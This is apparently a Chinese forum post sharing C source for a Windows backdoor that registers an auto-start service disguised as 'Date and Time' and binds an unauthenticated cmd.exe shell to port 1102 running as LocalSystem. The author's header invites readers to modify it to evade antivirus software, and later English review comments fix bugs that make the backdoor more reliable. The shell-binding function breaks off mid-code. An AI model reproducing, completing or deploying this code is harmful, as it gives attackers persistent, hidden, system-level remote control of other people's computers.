如果要改的话(最好是改一下),把那个BindCmd2Port函数整个改掉吧,我都记不得是哪里paste过来的了。
写得匆忙,主要是急着用。本来很喜欢T-Cmd的,可是没有源代码看,只好自己写,抛砖而已,大家有玉请砸过来。
在Windows2000 Pro(???)正常(?)运行。
/*
This program creates a service which binds a
cmd.exe to port 1102 (the port is a global and can
easily be changed in the source). Try to modify it
to escape from the anti-virus software.
Please do not repost this code elsewhere.
by N.E.V.E.R@SEU
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment (lib, "WS2_32.lib")
//Global Variables
/* ---- Global state shared between main(), ServiceMain and the worker ---- */

/* TCP port the command shell is bound to (any value 1..65535). */
int port = 1102;

/* Internal service name registered with the SCM and used in the
 * service table in main(). */
char ServicesName[255] = "Date and Time";

/* Name shown in the Services console. */
char ServicesDisplayName[255] = "Date and Time";

/* Event used to signal termination; created/used outside this excerpt. */
HANDLE hTerminateEvent = NULL;

/* Status handle for reporting state to the SCM (presumably obtained from
 * RegisterServiceCtrlHandler in ServiceMain -- definition not in view). */
SERVICE_STATUS_HANDLE hServiceStatus;

/* Pause/running flags and the worker thread handle, maintained by the
 * service control code outside this excerpt. */
BOOL bPauseService = FALSE;
BOOL bRunningService = FALSE;
HANDLE hThread = NULL;

/* ---- Forward declarations ---- */

/* Worker thread body: listens on `port` and attaches cmd.exe to each
 * accepted connection. Thread-procedure style signature. */
DWORD BindCmd2Port(LPVOID lpParam);

/* Reports a service status to the SCM. The five DWORDs are assumed to map
 * onto SERVICE_STATUS fields (state, exit codes, checkpoint, wait hint) --
 * confirm against the definition, which is not in view. */
BOOL SendStatusToSCM(DWORD, DWORD, DWORD, DWORD, DWORD);

BOOL InitService(void);

/* NOTE(review): Handler and ServiceMain are declared without WINAPI
 * (stdcall), yet main() casts ServiceMain to LPSERVICE_MAIN_FUNCTION and
 * the SCM calls both. On 32-bit x86 a cdecl definition would mismatch the
 * calling convention the SCM expects -- confirm the definitions carry
 * WINAPI. */
VOID Handler(DWORD fdwControl);
VOID terminate(DWORD dwError);
VOID ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
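/*
 * Program entry point.
 *
 * Invoked as "<exe> /install": registers this executable with the SCM as an
 * auto-start service named ServicesName and starts it.  Invoked with no
 * arguments (which is how the SCM launches it): hands control to
 * StartServiceCtrlDispatcher, which calls ServiceMain on its own thread.
 *
 * NOTE(review): CreateService is given a NULL account, so the service runs
 * as LocalSystem, and BindCmd2Port listens on INADDR_ANY with no
 * authentication -- anything that can reach `port` gets a SYSTEM shell.
 *
 * Changes from the original: the SCM handle is checked before use, the
 * module path is checked for failure/truncation and quoted when it contains
 * spaces (an unquoted service path is resolved ambiguously, CWE-428), the
 * service is started via StartService instead of WinExec("net start ...")
 * plus a fixed Sleep, and only SERVICE_START is requested on the new
 * service handle instead of SERVICE_ALL_ACCESS.
 */
void main(int argc, char* argv[])
{
    if (argc == 2 && !strcmp(argv[1], "/install"))
    {
        char modulePath[_MAX_PATH];
        char binaryPathName[_MAX_PATH + 2];   /* path plus two quote chars */
        DWORD pathLen;
        SC_HANDLE scm;
        SC_HANDLE svc;

        pathLen = GetModuleFileName(NULL, modulePath, sizeof(modulePath));
        if (pathLen == 0 || pathLen >= sizeof(modulePath))
        {
            /* Failed or truncated: registering the buffer as-is would
             * install a garbage path. */
            printf("Error Creating Services...");
            return;
        }

        /* pathLen < _MAX_PATH, so the quoted form always fits. */
        if (strchr(modulePath, ' ') != NULL)
        {
            strcpy(binaryPathName, "\"");
            strcat(binaryPathName, modulePath);
            strcat(binaryPathName, "\"");
        }
        else
        {
            strcpy(binaryPathName, modulePath);
        }

        scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
        if (scm == NULL)
        {
            /* The original passed a NULL handle straight on to CreateService. */
            printf("Error Creating Services...");
            return;
        }

        /* SERVICE_START is all that StartService below needs. */
        svc = CreateService(scm, ServicesName, ServicesDisplayName,
                            SERVICE_START, SERVICE_WIN32_OWN_PROCESS,
                            SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
                            binaryPathName, NULL, NULL, NULL, NULL, NULL);
        if (svc == NULL)
        {
            printf("Error Creating Services...");
        }
        else
        {
            /* Start through the API: no child process, no fixed delay, and
             * the result is actually checked. */
            if (!StartService(svc, 0, NULL))
                printf("Error Starting Services...");
            CloseServiceHandle(svc);
        }
        CloseServiceHandle(scm);
        return;
    }

    /* NOTE(review): ServiceMain is declared without WINAPI; the cast below
     * silences the LPSERVICE_MAIN_FUNCTION type mismatch rather than fixing
     * it.  Confirm the definition uses the stdcall convention. */
    SERVICE_TABLE_ENTRY serviceTable[] =
    {
        { ServicesName, (LPSERVICE_MAIN_FUNCTION) ServiceMain },
        { NULL, NULL }
    };
    if (!StartServiceCtrlDispatcher(serviceTable))
    {
        printf("Failed at StartServiceCtrlDispatcher..\n");
        printf("or you run this .exe directly? Try \n %s /install", argv[0]);
        return;
    }
}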
DWORD BindCmd2Port(LPVOID lp)
{
char cmdLine[] = \"cmd.exe\";
SOCKET s=INVALID_SOCKET;
WSADATA WSAData;
int ret;
char Buff[2048];
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return 0;
if((s=socket(AF_INET, SOCK_STREAM, 0))==INVALID_SOCKET)
{
closesocket(s);
WSACleanup();
return 0;
}
sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
addr.sin_port = htons(port);
if(bind(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)
return 0;
if(listen(s,1)==SOCKET_ERROR)
return 0;
int temp=sizeof(addr);
while(1){
s=accept(s,(sockaddr*)&addr,&temp);
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;